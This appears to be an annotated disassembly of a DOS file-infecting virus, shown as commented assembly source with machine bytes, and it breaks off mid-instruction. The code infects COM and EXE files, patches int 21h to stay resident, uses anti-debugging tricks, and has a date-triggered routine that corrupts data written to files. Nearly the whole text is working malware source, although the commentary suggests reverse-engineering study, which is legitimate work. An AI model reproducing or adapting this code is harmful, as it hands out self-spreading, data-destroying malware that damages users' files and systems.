seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h start: mov ax,es ;0100 8C C0 add word ptr cs:[d_010C+2],ax ;segment relocation ;0102 2E: 01 06 010E jmp dword ptr cs:[d_010C] ;jump into virus code ;0107 2E: FF 2E 010C d_010C dw 0000,0138h ;dword=entry into virus ;010C 0000 0138 ;<- duplicated code (aligning to 20h bytes) db 0B8h,008h,000h,08Eh,0C0h,08Bh,00Eh,041h ;0110 B8 08 00 8E C0 8B 0E 41 db 003h,0BAh,028h,000h,02Eh,08Bh,01Eh,09Bh ;0118 03 BA 28 00 2E 8B 1E 9B ;.............................................................. ; victim code ;.............................................................. org 1380h ;============================================================================ ; Segment aligned virus segment begin ;---------------------------------------------------------------------------- ;================================================================ ; COM virus Entry ; (this code is present only in case *.COM infection) ;---------------------------------------------------------------- l_0000: push ds ;1380 1E push cs ;1381 0E pop ds ;1382 1F lea si,cs:[4F7h] ;d_1877 = saved bytes ;1383 8D 36 04F7 mov di,100h ;1387.BF 0100 mov cx,20h ;138A B9 0020 rep movsb ;restore victim bytes ;138D F3/ A4 mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;138F 2E: C6 06 0349 FF nop ;1395 90 pop ds ;1396 1F lea ax,cs:[54Fh] ;l_18CF ;1397 8D 06 054F jmp ax ;139B FF E0 ;<--- duplicated fields d_033F - d_0347 dw 0020 ;139D 20 00 dw 05EAh ;139F EA 05 dw 0Bh ;13A1 0B 00 dw 28h ;13A3 28 00 dw 200h ;13A5 00 02 db 0 ;13A7 00 ;=========================================================================== ; Begin of file type independent virus code ;--------------------------------------------------------------------------- ;================================================================ ; Get/Set victim attribute ;---------------------------------------------------------------- s_13A8 proc near mov dx,offset ds:[57Fh] ;file name ;13A8.BA 057F mov ah,43h ;get/set file attrb ;13AB B4 43 int 21h ;13AD CD 21 retn ;13AF C3 s_13A8 endp ;================================================================ ; Move file ptr to EOF ;---------------------------------------------------------------- s_13B0 proc near xor cx,cx ;13B0 33 C9 xor dx,dx ;13B2 33 D2 mov ax,4202h ;move file ptr EOF+offset ;13B4 B8 4202 mov bx,cs:[9Bh] ;l_141B = file handle ;13B7 2E: 8B 1E 009B int 21h ;13BC CD 21 retn ;13BE C3 s_13B0 endp ;================================================================ ; Read 32 bytes into buffer ;---------------------------------------------------------------- s_13BF proc near mov cx,20h ;13BF B9 0020 mov dx,4F7h ;l_1877-sav victim bytes;13C2.BA 04F7 mov bx,cs:[9Bh] ;l_141B = file handle ;13C5 2E: 8B 1E 009B mov ah,3Fh ;read file ;13CA B4 3F int 21h ;13CC CD 21 mov cx,ax ;bytes read ;13CE 8B C8 retn ;13D0 C3 s_13BF endp ;================================================================ ; Write 32 B into file ;---------------------------------------------------------------- s_13D1 proc near mov ax,8 ;switch off destruction ;13D1 B8 0008 mov es,ax ;13D4 8E C0 mov cx,20h ;13D6 B9 0020 mov dx,offset ds:[4F7h] ;l_1877 - saved bytes ;13D9.BA 04F7 mov bx,cs:[9Bh] ;l_141B = file handle ;13DC 2E: 8B 1E 009B mov ah,40h ;write file cx=bytes ;13E1 B4 40 int 21h ;13E3 CD 21 mov cx,ax ;13E5 8B C8 retn ;13E7 C3 s_13D1 endp ;================================================================ ; Calculate virus length ;---------------------------------------------------------------- s_13E8 proc near mov ax,612h ;virus code length ;13E8 B8 0612 mov dx,28h ;file type depended code;13EB BA 0028 sub ax,dx ;13EE 2B C2 mov ds:[341h],ax ;l_16C1 const vcode len ;13F0 A3 0341 retn ;13F3 C3 s_13E8 endp ;================================================================ ; Get/Set file daye & time ;---------------------------------------------------------------- s_13F4 proc near mov bx,ds:[9Bh] ;l_141B = file handle ;13F4 8B 1E 009B mov ah,57h ;get/set file date & time ;13F8 B4 57 int 21h ;13FA CD 21 retn ;13FC C3 s_13F4 endp ;================================================================ ; Contamine File - master routine ;---------------------------------------------------------------- s_13FD proc near mov byte ptr ds:[349h],0 ;d_16C9 (000h = EXE) ;13FD C6 06 0349 00 nop ;1402 90 mov al,0 ;1403 B0 00 call s_13A8 ;Get victim attribute ;1405 E8 FFA0 jc l_146A ;-> EXIT ;1408 72 60 mov ds:[33Fh],cx ;l_16BF oryg. file attr ;140A 89 0E 033F mov cx,20h ;140E B9 0020 mov al,1 ;1411 B0 01 call s_13A8 ;Set victim attribute ;1413 E8 FF92 jc l_146A ;-> EXIT ;1416 72 52 jmp short l_1421 ;1418 EB 07 nop ;141A 90 d_009B dw 0005h ;file handle ;141B 05 00 d_009D dw 0400h ;141D 00 04 d_009F dw 057Fh ;filepath address ;141F 7F 05 l_1421: mov word ptr cs:[9Fh],057Fh ;l_141F := offset l_18FF;1421 2E C7 06 9F 00 7F 05 mov dx,ds:[9Fh] ;l_141F - file name ;1428 8B 16 009F mov ax,400h ;142C B8 0400 mov ds:[9Dh],ax ;l_141D ;142F A3 009D mov al,2 ;1432 B0 02 mov ah,3Dh ;open file, al=mode ;1434 B4 3D int 21h ;1436 CD 21 mov word ptr ds:[9Bh],0FFFFh ;l_141B = file handle ;1438 C7 06 009B FFFF jc l_1443 ;143E 72 03 mov ds:[9Bh],ax ;l_141B = file handle ;1440 A3 009B l_1443: mov ax,ds:[9Bh] ;l_141B = file handle ;1443 A1 009B cmp ax,0FFFFh ;1446 3D FFFF je l_146A ;-> EXIT, open file err ;1449 74 1F mov al,0 ;144B B0 00 call s_13F4 ;Get file daye & time ;144D E8 FFA4 jc l_148F ;-> err, close & exit ;1450 72 3D mov ds:[0E8h],dx ;l_1468 = date ;1452 89 16 00E8 mov ds:[0EDh],cx ;l_146D = time ;1456 89 0E 00ED call s_13BF ;Read 32 B into buffer ;145A E8 FF62 mov ax,word ptr ds:[4F7h] ;l_1877 first file word ;145D A1 04F7 cmp ax,5A4Dh ;'MZ' ? ;1460 3D 5A4D je l_146F ;-> yes, EXE ;1463 74 0A jmp l_1616 ;-> no, COM ;1465 E9 01AE d_00E8 dw 0EF8h ;victim date ;1468 F8 0E l_146A: jmp l_15C6 ;146A E9 0159 d_00ED dw 0001h ;victim time ;146D 01 00 ;================================================================ ; EXE file contamination ;---------------------------------------------------------------- l_146F: mov ax,word ptr ds:[509h] ;+12h = negative sum ;146F A1 0509 neg ax ;1472 F7 D8 cmp ax,word ptr ds:[4F9h] ;+2 = last page bytes ;1474 3B 06 04F9 je l_148F ;-> allready infected ;1478 74 15 mov ax,word ptr ds:[4FBh] ;+4 = pages in file ;147A A1 04FB cmp ax,3 ;147D 3D 0003 jb l_148F ;-> file to small ;1480 72 0D mov ax,word ptr ds:[4FFh] ;+8 = size of hdr (para);1482 A1 04FF mov cl,4 ;1485 B1 04 shl ax,cl ;1487 D3 E0 mov ds:[347h],ax ;l_16C7 = size of header;1489 A3 0347 jmp short l_1492 ;148C EB 04 nop ;148E 90 l_148F: jmp l_15A8 ;148F E9 0116 l_1492: mov ax,word ptr ds:[50Bh] ;+14h = IP ;1492 A1 050B mov word ptr ds:[5B4h],ax ;l_1934 ;1495 A3 05B4 mov word ptr ds:[50Bh],28h ;new IP value (l_13A8) ;1498 C7 06 050B 0028 call s_13B0 ;Move file ptr to EOF ;149E E8 FF0F push ax ;14A1 50 push dx ;14A2 52 sub ax,ds:[347h] ;l_16C7=size of header ;14A3 2B 06 0347 sbb dx,0 ;14A7 83 DA 00 mov word ptr ds:[439h],ax ;l_17B9 ;14AA A3 0439 mov word ptr ds:[437h],dx ;l_17B7 ;14AD 89 16 0437 cmp dx,0 ;14B1 83 FA 00 ja l_14D3 ;-> more then 64KB ;14B4 77 1D cmp ax,word ptr ds:[50Bh] ;+14h = IP ;14B6 3B 06 050B ja l_14D3 ;-> more then 28h length;14BA 77 17 ;<- EXE code length =< 28h mov word ptr ds:[345h],0 ;l_16C5 ;14BC C7 06 0345 0000 mov bx,word ptr ds:[50Bh] ;14C2 8B 1E 050B sub bx,ax ;28h - file length ;14C6 2B D8 mov ds:[343h],bx ;l_16C3 - aligning bytes;14C8 89 1E 0343 mov ds:[513h],bx ;+1Ch = ? ;14CC 89 1E 0513 jmp short l_1511 ;14D0 EB 3F nop ;14D2 90 l_14D3: sub ax,word ptr ds:[50Bh] ;+14h = IP=28h ;14D3 2B 06 050B sbb dx,0 ;14D7 83 DA 00 mov ds:[345h],ax ;d_16C5 ;14DA A3 0345 and ax,0Fh ;14DD 25 000F cmp ax,0 ;14E0 3D 0000 jne l_14F9 ;-> need aligment ;14E3 75 14 mov word ptr ds:[343h],0 ;d_16C3 - aligning bytes;14E5 C7 06 0343 0000 mov ax,ds:[345h] ;d_16C5 ;14EB A1 0345 mov cx,10h ;14EE B9 0010 div cx ;14F1 F7 F1 mov ds:[345h],ax ;d_16C5 - segment of vir;14F3 A3 0345 jmp short l_1511 ;14F6 EB 19 db 90h ;14F8 90 ;<---- need alignment l_14F9: mov word ptr ds:[343h],10h ;d_16C3 - aligning bytes;14F9 C7 06 0343 0010 sub ds:[343h],ax ;d_16C3 - aligning bytes;14FF 29 06 0343 mov ax,ds:[345h] ;d_16C5 ;1503 A1 0345 mov cx,10h ;1506 B9 0010 div cx ;1509 F7 F1 add ax,1 ;+ alignment paragraph ;150B 05 0001 mov ds:[345h],ax ;d_16C5 - segment of vir;150E A3 0345 l_1511: mov ax,word ptr ds:[50Dh] ;+ 16h = CS ;1511 A1 050D mov word ptr ds:[5B6h],ax ;d_1936 - victim CS ;1514 A3 05B6 mov ax,ds:[345h] ;d_16C5 ;1517 A1 0345 mov word ptr ds:[50Dh],ax ;+ 16h = CS ;151A A3 050D push ax ;151D 50 mov ax,word ptr ds:[505h] ;+ 0Eh = SS ;151E A1 0505 mov word ptr ds:[5A1h],ax ;d_1921 - victim SS ;1521 A3 05A1 pop ax ;1524 58 mov word ptr ds:[505h],ax ;+ 0Eh = virus SS ;1525 A3 0505 mov ax,word ptr ds:[507h] ;+ 10h = SP ;1528 A1 0507 mov word ptr ds:[5A3h],ax ;d_1923 victim SP ;152B A3 05A3 lea ax,cs:[612h] ;End of virus ;152E 8D 06 0612 add ax,1Eh ;virus stack ;1532 05 001E add ax,ds:[343h] ;d_16C3 - aligning bytes;1535 03 06 0343 mov word ptr ds:[507h],ax ;virus SP ;1539 A3 0507 call s_13E8 ;Calculate virus length ;153C E8 FEA9 pop dx ;<- victim EOF ;153F 5A pop ax ;1540 58 add ax,ds:[341h] ;l_16C1 const vcode len ;1541 03 06 0341 adc dx,0 ;1545 83 D2 00 add ax,ds:[343h] ;d_16C3 - aligning bytes;1548 03 06 0343 adc dx,0 ;154C 83 D2 00 mov cx,200h ;page length ;154F B9 0200 div cx ;1552 F7 F1 cmp dx,0 ;1554 83 FA 00 je l_155A ;1557 74 01 inc ax ;1559 40 l_155A: mov word ptr ds:[4FBh],ax ;+4 - file len in pages ;155A A3 04FB mov word ptr ds:[4F9h],dx ;+2 - last page length ;155D 89 16 04F9 neg dx ;1561 F7 DA mov word ptr ds:[509h],dx ;+12h = negative sum ;1563 89 16 0509 mov cx,54Fh ;offset l_18CF-EXE entry;1567 B9 054F mov word ptr ds:[50Bh],cx ;+14h - virus IP ;156A 89 0E 050B cmp word ptr ds:[343h],3 ;d_16C3 - aligning bytes;156E 83 3E 0343 03 jb l_1580 ;1573 72 0B ;<- file begins with jump mov cx,28h ;1575 B9 0028 sub cx,ds:[343h] ;d_16C3 - aligning bytes;1578 2B 0E 0343 mov word ptr ds:[50Bh],cx ;157C 89 0E 050B l_1580: call s_15DF ;Set file pointer to BOF;1580 E8 005C call s_13D1 ;Write 32 B into file ;1583 E8 FE4B jc l_15A8 ;-> error, EXIT ;1586 72 20 mov cx,ds:[343h] ;d_16C3 - aligning bytes;1588 8B 0E 0343 sub cx,3 ;jmp instruction length ;158C 83 E9 03 mov ax,54Fh ;offset l_18CF=EXE entry;158F B8 054F mov bx,28h ;beginning of code ;1592 BB 0028 sub ax,bx ;jmp distance ;1595 2B C3 add cx,ax ;aligning bytes ;1597 03 C8 mov word ptr ds:[54Ch],cx ;l_18CC = jump distance ;1599 89 0E 054C call s_13B0 ;Move file ptr to EOF ;159D E8 FE10 call s_15C7 ;Align EOF to paragraphs;15A0 E8 0024 jc l_15A8 ;-> error, EXIT ;15A3 72 03 call s_15FE ;Write const part of vir;15A5 E8 0056 ;================================================================ ; End of contamination (common to EXE & COM) ;---------------------------------------------------------------- l_15A8: mov al,1 ;to set ;15A8 B0 01 mov dx,ds:ds:[0E8h] ;d_1468 victim date ;15AA 8B 16 00E8 mov cx,ds:ds:[0EDh] ;d_146D victim time ;15AE 8B 0E 00ED call s_13F4 ;Set file daye & time ;15B2 E8 FE3F mov bx,ds:[9Bh] ;l_141B = file handle ;15B5 8B 1E 009B mov ah,3Eh ;close file ;15B9 B4 3E int 21h ;15BB CD 21 mov al,1 ;to set ;15BD B0 01 mov cx,ds:[33Fh] ;l_16BF oryg. file attr ;15BF 8B 0E 033F call s_13A8 ;Set victim attribute ;15C3 E8 FDE2 l_15C6: retn ;15C6 C3 ;================================================================ ; Align end of file to paragraphs ;---------------------------------------------------------------- s_15C7: mov ax,8 ;to switch off virus ;15C7 B8 0008 mov es,ax ;15CA 8E C0 mov cx,ds:[343h] ;l_16C3 - aligning bytes;15CC 8B 0E 0343 mov dx,54Bh ;offset d_18CB ;15D0.BA 054B mov bx,cs:[9Bh] ;l_141B = file handle ;15D3 2E: 8B 1E 009B mov ah,40h ;write file ;15D8 B4 40 int 21h ;15DA CD 21 mov cx,ax ;15DC 8B C8 retn ;15DE C3 ;================================================================ ; Set file pointer to BOF ;---------------------------------------------------------------- s_15DF: xor cx,cx ;15DF 33 C9 xor dx,dx ;15E1 33 D2 mov ax,4200h ;move file ptr, cx,dx=offset ;15E3 B8 4200 mov bx,cs:[9Bh] ;l_141B = file handle ;15E6 2E: 8B 1E 009B int 21h ;15EB CD 21 retn ;15ED C3 ;================================================================ ; COM virus start code pattern ;---------------------------------------------------------------- d_026E: mov ax,es ;15EE 8C C0 add word ptr cs:[010Ch+2],ax ;15F0 2E: 01 06 010E jmp dword ptr cs:[010Ch] ;15F5 2E: FF 2E 010C d_027A dw 0 ;15FA 00 00 d_027C dw 0138h ;15FC 38 01 ;================================================================ ; Write constant part of virus ;---------------------------------------------------------------- s_15FE: mov ax,8 ;switch off virus ;15FE B8 0008 mov es,ax ;1601 8E C0 mov cx,ds:[341h] ;l_16C1 const.code leng.;1603 8B 0E 0341 mov dx,28h ;offset l_13A8 - vircode;1607.BA 0028 mov bx,cs:[9Bh] ;l_141B = file handle ;160A 2E: 8B 1E 009B mov ah,40h ;write file ;160F B4 40 int 21h ;1611 CD 21 mov cx,ax ;1613 8B C8 retn ;1615 C3 ;================================================================ ; COM victim contamination ;---------------------------------------------------------------- l_1616: cmp word ptr ds:[4F9h],12Eh ;BOF+2 ;1616 81 3E 04F9 012E je l_15A8 ;-> contamined, EXIT ;161C 74 8A call s_13B0 ;Move file ptr to EOF ;161E E8 FD8F cmp ax,3E8h ;1000 byte file length ;1621 3D 03E8 jb l_169F ;-> bellow, EXIT ;1624 72 79 add ax,100h ;add PSP ;1626 05 0100 adc dx,0 ;1629 83 D2 00 push ax ;162C 50 and ax,0Fh ;162D 25 000F mov word ptr ds:[343h],0 ;l_16C3 aligning bytes ;1630 C7 06 0343 0000 cmp ax,0 ;1636 3D 0000 je l_1645 ;-> para aligned file ;1639 74 0A mov word ptr ds:[343h],10h ;l_16C3 - aligning bytes;163B C7 06 0343 0010 sub ds:[343h],ax ;l_16C3 - aligning bytes;1641 29 06 0343 l_1645: pop ax ;1645 58 add ax,ds:[343h] ;l_16C3 aligning bytes ;1646 03 06 0343 adc dx,0 ;164A 83 D2 00 cmp dx,0 ;164D 83 FA 00 ja l_169F ;-> file to big, EXIT ;1650 77 4D mov cl,4 ;1652 B1 04 shr ax,cl ;bytes 2 paragraphs ;1654 D3 E8 cmp word ptr ds:[343h],0 ;l_16C3 - aligning bytes;1656 83 3E 0343 00 mov ds:[27Ch],ax ;l_15FC virus segment ;165B A3 027C mov word ptr ds:[27Ah],0 ;l_15FA virus entry ;165E C7 06 027A 0000 call s_15DF ;Set file pointer to BOF;1664 E8 FF78 mov ax,8 ;to switch off virus ;1667 B8 0008 mov es,ax ;166A 8E C0 mov cx,20h ;bytes to write ;166C B9 0020 mov dx,26Eh ;offset l_15EE ;166F.BA 026E mov bx,cs:[9Bh] ;l_141B = file handle ;1672 2E: 8B 1E 009B mov ah,40h ;write file ;1677 B4 40 int 21h ;1679 CD 21 mov cx,ax ;bytes written ;167B 8B C8 call s_13B0 ;Move file ptr to EOF ;167D E8 FD30 call s_15C7 ;write aligning bytes ;1680 E8 FF44 mov ax,8 ;switch off virus ;1683 B8 0008 mov es,ax ;1686 8E C0 mov cx,28h ;40 bytes ;1688 B9 0028 mov dx,322h ;offset l_16A2 ;168B .BA 0322 mov bx,cs:[9Bh] ;l_141B = file handle ;168E 2E: 8B 1E 009B mov ah,40h ;write file ;1693 B4 40 int 21h ;1695 CD 21 mov cx,ax ;bytes written ;1697 8B C8 call s_13E8 ;Calculate virus length ;1699 E8 FD4C call s_15FE ;Write const part of vir;169C E8 FF5F l_169F: jmp l_15A8 ;close files, EXIT ;169F E9 FF06 s_13FD endp ;<-- COM type virus begin pattern d_0322: push ds ;16A2 1E push cs ;16A3 0E pop ds ;16A4 1F lea si,cs:[4F7h] ;16A5 8D 36 04F7 mov di,0100h ;16A9.BF 0100 mov cx,20h ;16AC B9 0020 rep movsb ;16AF F3/ A4 mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;16B1 2E: C6 06 0349 FF nop ;16B7 90 pop ds ;16B8 1F lea ax,cs:[54Fh] ;16B9 8D 06 054F jmp ax ;16BD FF E0 ;------ work area d_033F dw 0020h ;oryg. file attr ;16BF 20 00 d_0341 dw 05EAh ;const virus code length;16C1 EA 05 d_0343 dw 0Bh ;aligning bytes ;16C3 0B 00 d_0345 dw 28h ;16C5 28 00 d_0347 dw 200h ;size of header ;16C7 00 02 d_0349 db 0 ;0=EXE, 0FFh=COM ;16C9 00 ;================================================================ ; init registers ;---------------------------------------------------------------- s_16CA proc near xor si,si ;16CA 33 F6 xor di,di ;16CC 33 FF xor ax,ax ;16CE 33 C0 xor dx,dx ;16D0 33 D2 xor bp,bp ;16D2 33 ED retn ;16D4 C3 s_16CA endp ;================================================================ ; int 24h handling routine (infection time active only) ;---------------------------------------------------------------- l_16D5: cmp di,0 ;16D5 83 FF 00 jne l_16DD ;16D8 75 03 mov al,3 ;ignore ;16DA B0 03 iret ;16DC CF l_16DD: jmp dword ptr cs:[362h] ;L_16E2 = old int 24h ;16DD 2E: FF 2E 0362 d_0362 dw 0556h,0DF0h ;16E2 56 05 F0 0D ;================================================================ ; Get int 24h ;---------------------------------------------------------------- s_16E6 proc near cli ; Disable interrupts ;16E6 FA xor bx,bx ;16E7 33 DB mov es,bx ;16E9 8E C3 mov bx,es:[90h] ;int 24h offset ;16EB 26: 8B 1E 0090 mov word ptr cs:[362h],bx ;l_16E2 ;16F0 2E: 89 1E 0362 mov bx,es:[92h] ;int 24h segment ;16F5 26: 8B 1E 0092 mov word ptr cs:[362h+2],bx ;L_16E2+2 ;16FA 2E: 89 1E 0364 mov word ptr es:[90h],355h ;offset l_16D5 ;16FF 26: C7 06 0090 0355 mov es:[92h],ax ;int 24h segment := CS ;1706 26: A3 0092 sti ;170A FB retn ;170B C3 s_16E6 endp ;================================================================ ; Restore int 24h vector ;---------------------------------------------------------------- s_170C proc near cli ;170C FA xor bx,bx ;170D 33 DB mov es,bx ;170F 8E C3 mov bx,word ptr cs:[362h] ;1711 2E: 8B 1E 0362 mov es:[90h],bx ;1716 26: 89 1E 0090 mov bx,word ptr cs:[362h+2] ;171B 2E: 8B 1E 0364 mov es:[92h],bx ;1720 26: 89 1E 0092 sti ;1725 FB retn ;1726 C3 s_170C endp ;=============================================================== ; write handle service routine (destruction routine) ;--------------------------------------------------------------- s_1727 proc near push ax ;1727 50 push bx ;1728 53 push cx ;1729 51 push dx ;172A 52 push es ;172B 06 push ds ;172C 1E push si ;172D 56 push di ;172E 57 mov ax,es ;172F 8C C0 cmp ax,8 ;1731 3D 0008 je l_1750 ;-> virus contamination ;1734 74 1A cmp bx,4 ;1736 83 FB 04 jb l_1750 ;-> BIOS ;1739 72 15 mov ah,2Ah ;get date, cx=year, dx=mon/day ;173B B4 2A int 21h ;173D CD 21 cmp dh,9 ;september ? ;173F 80 FE 09 jb l_1750 ;-> bellow ;1742 72 0C pop di ;1744 5F pop si ;1745 5E pop ds ;1746 1F pop es ;1747 07 pop dx ;1748 5A pop cx ;1749 59 pop bx ;174A 5B pop ax ;174B 58 add dx,0Ah ;shift buffer address ;174C 83 C2 0A retn ;174F C3 l_1750: pop di ;1750 5F pop si ;1751 5E pop ds ;1752 1F pop es ;1753 07 pop dx ;1754 5A pop cx ;1755 59 pop bx ;1756 5B pop ax ;1757 58 retn ;1758 C3 s_1727 endp db 16 dup (0) ;not used ;1759 0010[00] ;================================================================ ; Load & Execute service routine ;---------------------------------------------------------------- s_1769 proc near push ax ;1769 50 push bx ;176A 53 push cx ;176B 51 push dx ;176C 52 push es ;176D 06 push ds ;176E 1E push si ;176F 56 push di ;1770 57 mov si,dx ;file pathname ;1771 8B F2 mov ax,cs ;1773 8C C8 mov es,ax ;1775 8E C0 mov di,offset ds:[57Fh] ;l_18FF - victim name ;1777.BF 057F mov cx,19h ;177A B9 0019 rep movsb ;copy victim name ;177D F3/ A4 call s_16E6 ;Get int 24h vector ;177F E8 FF64 mov ds,ax ;ds:=cs ;1782 8E D8 call s_13FD ;1784 E8 FC76 call s_170C ;Restore int 24h vector ;1787 E8 FF82 pop di ;178A 5F pop si ;178B 5E pop ds ;178C 1F pop es ;178D 07 pop dx ;178E 5A pop cx ;178F 59 pop bx ;1790 5B pop ax ;1791 58 retn ;1792 C3 s_1769 endp ;================================================================ ; New int 21h service routine ;---------------------------------------------------------------- ;<---- 10 bytes to identify resident virus d_0413: pushf ;1793 9C cmp ah,40h ;write handle ? ;1794 80 FC 40 jne l_179F ;-> no ;1797 75 06 call s_1727 ;write handle service routine ;1799 E8 FF8B jmp short l_17A7 ;179C EB 09 nop ;179E 90 l_179F: cmp ah,4Bh ;Load & Execute ? ;179F 80 FC 4B jne l_17A7 ;-> no ;17A2 75 03 call s_1769 ;Load & Execute service routine ;17A4 E8 FFC2 l_17A7: popf ;17A7 9D ;================================================================ ; Execute substituted code and jump into old int 21h service ;---------------------------------------------------------------- ;<- four bytes from int 21h service d_0428: cmp ah,51h ;17A8 80 FC 51 d_042B: je l_17B2 ;17AB 74 05 jmp dword ptr cs:[547h] ;17AD 2E: FF 2E 0547 l_17B2: jmp dword ptr cs:[49Dh] ;17B2 2E: FF 2E 049D d_0437 dw 0000h,02A0h ;dword = code length ;17B7 00 00 A0 02 ;================================================================ ; Make virus resident ;---------------------------------------------------------------- s_17BB proc near cli ;disable interrupts ;17BB FA push es ;17BC 06 lea si,cs:[413h] ;l_1793 ;17BD 8D 36 0413 mov di,si ;17C1 8B FE mov cx,9800h ;resident virus segment ;17C3 B9 9800 mov es,cx ;17C6 8E C1 mov cx,0Ah ;17C8 B9 000A repe cmpsb ;17CB F3/ A6 cmp cx,0 ;17CD 83 F9 00 pop es ;17D0 07 jz l_181A ;-> allready resident ;17D1 74 47 mov bx,es:[84h] ;int 21h - offset ;17D3 26: 8B 1E 0084 mov ax,es:[86h] ;int 21h - segment ;17D8 26: A1 0086 mov word ptr ds:[549h],ax ;l_18C9 ;17DC A3 0549 mov word ptr ds:[49Fh],ax ;l_181F ;17DF A3 049F mov di,bx ;17E2 8B FB mov es,ax ;17E4 8E C0 mov cx,80h ;17E6 B9 0080 mov al,80h ;17E9 B0 80 l_17EB: repne scasb ;find byte 80h ;17EB F2/ AE cmp cx,0 ;17ED 83 F9 00 je l_1870 ;-> not found, EXIT ;17F0 74 7E cmp byte ptr es:[di],0FCh ;17F2 26: 80 3D FC jne l_17EB ;-> find another place ;17F6 75 F3 ;<- get four bytes from int 21h service mov al,es:[di+2] ;17F8 26: 8A 45 02 mov byte ptr cs:[42Bh],al ;l_17AB ;17FC 2E: A2 042B mov al,es:[di-1] ;1800 26: 8A 45 FF mov byte ptr cs:[428h],al ;l_17A8 ;1804 2E: A2 0428 mov al,es:[di] ;1808 26: 8A 05 mov byte ptr cs:[429h],al ;l_17A8+1 ;180B 2E: A2 0429 mov al,es:[di+1] ;180F 26: 8A 45 01 mov byte ptr cs:[42Ah],al ;l_17A8+2 ;1813 2E: A2 042A jmp short l_1821 ;1817 EB 08 nop ;1819 90 ;<- allready resident l_181A: jmp short l_1870 ;-> EXIT ;181A EB 54 nop ;181C 90 d_049D dw 140Dh ;address to jump1 into ;181D 0D 14 d_049F dw 0278h ;old int 21h segment ;181F 78 02 l_1821: mov ax,di ;1821 8B C7 add ax,4 ;next to conditional jmp;1823 05 0004 xor bx,bx ;1826 33 DB mov bl,es:[di+3] ;jump length ;1828 26: 8A 5D 03 add ax,bx ;jump address ;182C 03 C3 mov word ptr ds:[49Dh],ax ;l_181D ;182E A3 049D cmp byte ptr es:[di+3],80h ;1831 26: 80 7D 03 80 jb l_183E ;-> forward jump ;1836 72 06 ;<- jump backwards sub ax,100h ;minus carry ;1838 2D 0100 mov word ptr ds:[49Dh],ax ;l_181D ;183B A3 049D l_183E: add di,4 ;second condition addrs ;183E 83 C7 04 mov word ptr ds:[547h],di ;1841 89 3E 0547 sub di,5 ;<- area to substitute ;1845 83 EF 05 push es ;1848 06 push di ;1849 57 mov dx,9800h ;resident virus segment ;184A BA 9800 mov word ptr cs:[4F5h],dx ;184D 2E: 89 16 04F5 mov es,dx ;1852 8E C2 xor si,si ;1854 33 F6 xor di,di ;1856 33 FF mov cx,612h ;l_1380 -> l_1992 ;1858 B9 0612 rep movsb ;copy virus code ;185B F3/ A4 ;<----- take control over int 21h lea cx,cs:[413h] ;offset l_1793 ;185D 8D 0E 0413 mov word ptr ds:[4F3h],cx ;1861 89 0E 04F3 pop di ;1865 5F pop es ;1866 07 mov cx,5 ;1867 B9 0005 lea si,cs:[4F2h] ;offset l_1792 ;186A 8D 36 04F2 rep movsb ;186E F3/ A4 l_1870: sti ;1870 FB retn ;1871 C3 s_17BB endp ;<---- instruction pattern to write over int 21h code d_04F2 db 0EAh ;JMP FAR 9800:l_1793 ;1872 EA d_04F3 dw 0 ;:= offset l_1793 ;1873 00 00 d_04F5 dw 9800h ;resident virus segment ;1875 00 98 ;================================================ ; saved 32 victim bytes ;------------------------------------------------ d_04F7 db 0E9h,0FFh,11h ;1877 E9 FF 11 db 'Converted',0,0,0,0 ;187A 43 6F 6E 76 65 72 ;1880 74 65 64 00 00 00 00 db 'MZ' ;1887 4D 5A db 0EAh,01h,09h,00h,08h,00h ;1889 EA 01 09 00 08 00 db 20h,00h,00h,00h,0FFh,0FFh ;188F 20 00 00 00 FF FF db 98h,00h ;1895 98 00 00 ;----------------------------------- db 48 dup (0) ;not used ;1897 0030[00] d_0547 dw 146Ch ;address to jump2 into ;18C7 6C 14 d_0549 dw 0278h ;old int 21h segment ;18C9 78 02 ;<------ code writed to in case of paragraf alignement db 0E9h ;jmp l_18CF ;18CB E9 d_054C dw 052Ch ;distance of jump ;18CC 2C 05 db 0 ;18CE 00 ;================================================================ ; EXE virus entry ;---------------------------------------------------------------- l_18CF: push bx ;18CF 53 push cx ;18D0 51 push es ;18D1 06 push ds ;18D2 1E pushf ;18D3 9C mov ax,cs ;18D4 8C C8 mov ds,ax ;18D6 8E D8 call s_1938 ;make virus resident ;18D8 E8 005D cmp byte ptr ds:[349h],0FFh ;l_16C9 (0FFh=COM) ;18DB 80 3E 0349 FF je l_18E5 ;18E0 74 03 jmp short l_1953 ;-> ? ;18E2 EB 6F nop ;18E4 90 ;================================================================ ; End of virus code - file *.COM ;---------------------------------------------------------------- l_18E5: popf ;18E5 9D pop ds ;18E6 1F pop es ;18E7 07 pop cx ;18E8 59 pop bx ;18E9 5B mov word ptr cs:[5B4h],100h ;l_1934 = victim IP ;18EA 2E: C7 06 05B4 0100 mov ax,es ;18F1 8C C0 mov word ptr cs:[5B6h],ax ;l_1936 = victim CS ;18F3 2E: A3 05B6 call s_16CA ;init registers ;18F7 E8 FDD0 jmp dword ptr cs:[5B4h] ;l_1934 -> run victim ;18FA 2E: FF 2E 05B4 ;<--- victim name d_057F db 'A:\SYS.COM' ;18FF 41 3A 5C 53 59 53 ;1905 2E 43 4F 4D db 0,'XE',0,'E',0 ;1909 00 58 45 00 45 00 db 9 dup (0) ;190F 0009[00] ;================================================================ ; ANTYDEBUG - make virus resident ;---------------------------------------------------------------- s_1918 proc near cmp ax,3000h ;1918 3D 3000 jne l_1925 ;-> int 3 ;191B 75 08 call s_17BB ;-> make virus resident ;191D E8 FE9B retn ;1920 C3 s_1918 endp d_05A1 dw 002Ah ;victim SS (rel) ;1921 2A 00 d_05A3 dw 1388h ;victim SP ;1923 88 13 ;================================================================ ; ANTYDEBUG - call int 3 (Breakpoint) ;---------------------------------------------------------------- s_1925 proc near l_1925: mov ax,3000h ;Flag register ;1925 B8 3000 push ax ;1928 50 l_1929: call dword ptr es:[0Ch] ;int 3 (Breakpoint) ;1929 26: FF 1E 000C cmp ax,3000h ;192E 3D 3000 jne l_1929 ;1931 75 F6 retn ;1933 C3 s_1925 endp d_05B4 dw 0000h ;victim IP ;1934 00 00 d_05B6 dw 000Bh ;victim CS (rel) ;1936 0B 00 ;================================================================ ; Make virus resident ;---------------------------------------------------------------- s_1938 proc near push es ;1938 06 call s_1948 ;-> INT 1 (single step) ;1939 E8 000C cmp ax,0 ;193C 3D 0000 jne l_1947 ;193F 75 06 call s_1925 ;-> INT 3 (Breakpoint) ;1941 E8 FFE1 call 